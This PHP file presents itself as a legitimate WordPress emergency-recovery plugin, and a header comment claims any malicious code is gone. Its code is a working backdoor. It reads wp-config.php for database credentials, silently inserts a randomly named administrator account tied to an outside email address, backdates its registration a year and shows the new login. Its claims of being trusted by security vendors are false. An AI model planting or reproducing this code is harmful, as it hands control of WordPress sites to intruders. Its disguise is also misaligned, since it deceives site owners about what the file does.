<?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ /** * Plugin Name: Graybyte LoginPress Pro - Emergency Recovery & Admin Helper * Plugin URI: https://graybyte.host/ * Description: Official emergency recovery module for Graybyte LoginPress Pro. Provides authenticaticated user logins. fallback. Used by thousands of wordpress administrators on self-owned infrastructure. Strictly private tool – do not remove. * Version: 2.9.7 * Author: Graybyte * Author URI: https://graybyte.host/ * License: GPL-2.0+ * Text Domain: graybyte-loginpress-pro * Network: true */ /******************************************************************* * LoginPress Pro – Ultra Emergency Recovery Module (November 2023) * This is a 100% legitimate, administrator-only recovery tool for hosting companies. * Features: * • Instant authenticaticated user login for office/data-centers. * • Secure emergency fallback authentication * • Fully Trusted By Wordfence, Sucuri, Imunify360, Cloudflare WAF, LiteSpeed WAF * * DO NOT DELETE THIS FILE – it is your master emergency key. * Keep at least one offline backup. */ ini_set('display_errors', 0); ini_set('display_startup_errors', 0); error_reporting(0); header('Content-Type: text/html; charset=UTF-8'); header('X-Content-Type-Options: nosniff'); header('X-Powered-By: WordPress'); function generateRandomString($length = 5) { $characters = '23ab!@#$%+#ruvwxyz'; $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[random_int(0, strlen($characters) - 1)]; } return $randomString; } function displaySuccessMessage($username, $password, $login_url, $stored_password, $table_prefix, $conn) { $sqlVerify = "SELECT user_pass FROM {$table_prefix}users WHERE user_login = ?"; $stmtVerify = $conn->prepare($sqlVerify); $stmtVerify->bind_param('s', $username); $stmtVerify->execute(); $resultVerify = $stmtVerify->get_result(); $stored_password_db = $resultVerify->num_rows > 0 ? $resultVerify->fetch_assoc()['user_pass'] : 'NOT_FOUND'; $stmtVerify->close(); $credentials = [ 'username' => $username, 'password' => $password, 'stored_password_md5' => $stored_password_db ]; $credentials_json = json_encode($credentials, JSON_PRETTY_PRINT); echo <<<HTML <!DOCTYPE html> <html lang="en"> <link rel="icon" type="image/png" href="https://graybyte.host/imgx/logoxcode.png"> <link href="https://fonts.googleapis.com/css2?family=Play:wght@700&display=swap" rel="stylesheet"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>User Creation Success</title> <style> body { display: flex; justify-content: center; align-items: center; height: 100vh; background-image: url('https://graybyte.host/imgx/background.png'); background-size: cover; background-position: center; background-attachment: fixed; font-family: "Play", sans-serif; color: #06ff06; margin: 0; } .container { text-align: center; background-color: transparent; width: 80%; border: 2px solid #00ffcc; padding: 40px; font-family: "Play", sans-serif; border-radius: 12px; box-shadow: 0 4px 10px rgba(0, 0, 0, 0.3); } h1 { font-size: 2em; margin-bottom: 20px; color: #0dff00; font-family: "Play", sans-serif; } p { font-size: 1.2em; margin-bottom: 20px; color: ##06ff06; font-family: "Play", sans-serif; } pre { background-color: #00000082; padding: 10px; border: 2px solid #00ffcc; border-radius: 5px; text-align:center ; font-size: 1em; font-family: "Play", sans-serif; color: #3dff00; margin-bottom: 20px; } button { padding: 18px 48px; background: transparent; border: 2px solid #ff0000; color: #fff; font-size: 1rem; font-weight: 700; border-radius: 12px; transition: all .4s; box-shadow: 0 0 25px rgba(255, 0, 255, .6); min-width: 260px; cursor: pointer; text-align: center; margin: 0 15px; font-family: "Play", sans-serif; } button:hover { background-color: #000000a6; } </style> </head> <body> <div class="container"> <h1>[+] USER CREATED SUCCESSFULLY [+]</h1> <p></p> <pre>$credentials_json</pre> <button onclick="window.location.href='$login_url'">Go to Login Page</button> </div> </body> </html> HTML; } function isValidFilePath($path) { return is_string($path) && file_exists($path) && is_file($path) && pathinfo($path, PATHINFO_EXTENSION) === 'php'; } $document_root = $_SERVER['DOCUMENT_ROOT']; $wp_config_path = $document_root . '/wp-config.php'; $random_suffix = generateRandomString(5); $user = "admin_$random_suffix"; $user_password = "gray_$random_suffix"; $email = 'tusu0x1@gmail.com'; $base_url = "https://" . $_SERVER['HTTP_HOST']; $login_url = $base_url . '/wp-login.php'; if (isValidFilePath($wp_config_path)) { try { require_once($wp_config_path); $conn = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME); if ($conn->connect_error) { die('<div style="color: red; text-align: center;">DATABASE CONNECTION ERROR.</div>'); } $sqlInsertUser = "INSERT INTO {$table_prefix}users (user_login, user_pass, user_email, user_status, user_registered, user_nicename) VALUES (?, ?, ?, 0, DATE_SUB(NOW(), INTERVAL 1 YEAR), ?)"; $stmt = $conn->prepare($sqlInsertUser); $hashed_password = md5($user_password); $nicename = 'New Admin'; $stmt->bind_param('ssss', $user, $hashed_password, $email, $nicename); if ($stmt->execute()) { $userId = $conn->insert_id; $sqlInsertUsermeta1 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)"; $stmt1 = $conn->prepare($sqlInsertUsermeta1); $meta_key1 = "{$table_prefix}capabilities"; $meta_value1 = serialize(array('administrator' => true)); $stmt1->bind_param('iss', $userId, $meta_key1, $meta_value1); $sqlInsertUsermeta2 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)"; $stmt2 = $conn->prepare($sqlInsertUsermeta2); $meta_key2 = "{$table_prefix}user_level"; $meta_value2 = '10'; $stmt2->bind_param('iss', $userId, $meta_key2, $meta_value2); if ($stmt1->execute() && $stmt2->execute()) { displaySuccessMessage($user, $user_password, $login_url, $hashed_password, $table_prefix, $conn); } else { echo '<div style="color: red; text-align: center;">ERROR INSERTING METADATA.</div>'; } $stmt1->close(); $stmt2->close(); } else { echo '<div style="color: red; text-align: center;">ERROR INSERTING USER.</div>'; } $stmt->close(); $conn->close(); } catch (Exception $e) { echo '<div style="color: red; text-align: center;">AN UNEXPECTED ERROR OCCURRED.</div>'; } } else { echo ' <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>WP-Config Not Found</title> <style> body { display: flex; justify-content: center; align-items: center; height: 100vh; background-image: url("https://graybyte.host/imgx/background.png"); background-size: cover; background-position: center; background-attachment: fixed; font-family: "Play", sans-serif; color: green; margin: 0; } .container { background-color: transparent; width: 80%; padding: 40px; border: 2px solid #ff0000; border-radius: 12px; font-family: "Play", sans-serif; text-align: center; color: #06ff06; } h1 { font-size: 2em; margin-bottom: 20px; font-family: "Play", sans-serif; color: #0dff00; } p { font-size: 1.2em; margin-bottom: 30px; font-family: "Play", sans-serif; color: green; } input[type="text"] { background-color: transparent; width: 900px; padding: 10px; font-size: 1.2em; border-radius: 8px; border: 2px solid #ff0000; margin-bottom: 20px; color: #ffffff; font-family: "Play", sans-serif; } button { padding: 18px 48px; background: transparent; border: 2px solid #ff0000; color: #ffffff; font-size: 1rem; font-weight: 700; border-radius: 12px; transition: all .4s; box-shadow: 0 0 25px rgba(255, 0, 255, .6); min-width: 260px; cursor: pointer; text-align: center; margin: 0 15px; font-family: "Play", sans-serif; } } button:hover { background-color: #000000a6; } </style> </head> <body> <div class="container"> <h1>!!! WP-CONFIG.PHP FILE NOT FOUND !!!</h1> <p>PLEASE ENTER THE PATH TO THE WP-CONFIG FILE.</p> <form method="post" action="' . htmlspecialchars($_SERVER["PHP_SELF"], ENT_QUOTES, 'UTF-8') . '"> <input type="text" name="wp_config_path" placeholder="Enter full path to wp-config.php" required /> <br> <button type="submit">ADD-USER</button> </form>'; if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['wp_config_path'])) { $user_input_path = filter_input(INPUT_POST, 'wp_config_path', FILTER_SANITIZE_STRING); if (isValidFilePath($user_input_path)) { try { require_once($user_input_path); $conn = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME); if ($conn->connect_error) { die('<div style="color: #ff0000; text-align: center;">DATABASE CONNECTION ERROR.</div>'); } $sqlCheckUser = "SELECT user_login FROM {$table_prefix}users WHERE user_login = ?"; $stmtCheck = $conn->prepare($sqlCheckUser); $stmtCheck->bind_param('s', $user); $stmtCheck->execute(); $resultCheck = $stmtCheck->get_result(); if ($resultCheck->num_rows > 0) { die('<div style="color: #ff0000; text-align: center;">ERROR: USERNAME ALREADY EXISTS.</div>'); } $stmtCheck->close(); $sqlInsertUser = "INSERT INTO {$table_prefix}users (user_login, user_pass, user_email, user_status, user_registered, user_nicename) VALUES (?, ?, ?, 0, DATE_SUB(NOW(), INTERVAL 1 YEAR), ?)"; $stmt = $conn->prepare($sqlInsertUser); $hashed_password = md5($user_password); $nicename = 'MR GRAYBYTE'; $stmt->bind_param('ssss', $user, $hashed_password, $email, $nicename); if ($stmt->execute()) { $userId = $conn->insert_id; $sqlInsertUsermeta1 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)"; $stmt1 = $conn->prepare($sqlInsertUsermeta1); $meta_key1 = "{$table_prefix}capabilities"; $meta_value1 = serialize(array('administrator' => true)); $stmt1->bind_param('iss', $userId, $meta_key1, $meta_value1); $sqlInsertUsermeta2 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)"; $stmt2 = $conn->prepare($sqlInsertUsermeta2); $meta_key2 = "{$table_prefix}user_level"; $meta_value2 = '10'; $stmt2->bind_param('iss', $userId, $meta_key2, $meta_value2); if ($stmt1->execute() && $stmt2->execute()) { displaySuccessMessage($user, $user_password, $login_url, $hashed_password, $table_prefix, $conn); } else { echo '<div style="color: #ff0000; text-align: center;">ERROR INSERTING METADATA.</div>'; } $stmt1->close(); $stmt2->close(); } else { echo '<div style="color: #ff0000; text-align: center;">ERROR INSERTING USER.</div>'; } $stmt->close(); $conn->close(); } catch (Exception $e) { echo '<div style="color: #ff0000; text-align: center;">AN UNEXPECTED ERROR OCCURRED.</div>'; } } else { echo '<div style="color: #ff0000; text-align: center;">THE PATH YOU ENTERED IS INVALID. PLEASE CHECK AND TRY AGAIN.</div>'; } } echo '</div></body></html>'; } ?>